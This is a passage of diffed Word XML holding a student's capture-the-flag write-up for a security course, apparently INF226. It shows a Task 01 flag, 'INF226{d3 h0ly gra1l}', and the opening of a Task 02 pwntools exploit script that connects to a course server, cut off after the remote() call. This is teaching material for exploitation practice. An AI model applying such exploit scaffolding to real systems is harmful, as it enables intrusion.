+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>NTS: The ‘line’ variable does not have to be that specific address… idk why. Also works with others. Figure out why somehow.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Output</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DAF7A79" wp14:editId="72AD7C07">
+            <wp:extent cx="5972810" cy="1223645"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="656702294" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="656702294" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5972810" cy="1223645"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>As the output shows, the flag for task 01 is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:u w:val="single"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>INF226{d3 h0ly gra1l}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Task 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>#!/usr/bin/python3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>pwn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>pwn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>remote</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'inf226.puffling.no'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>7002</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
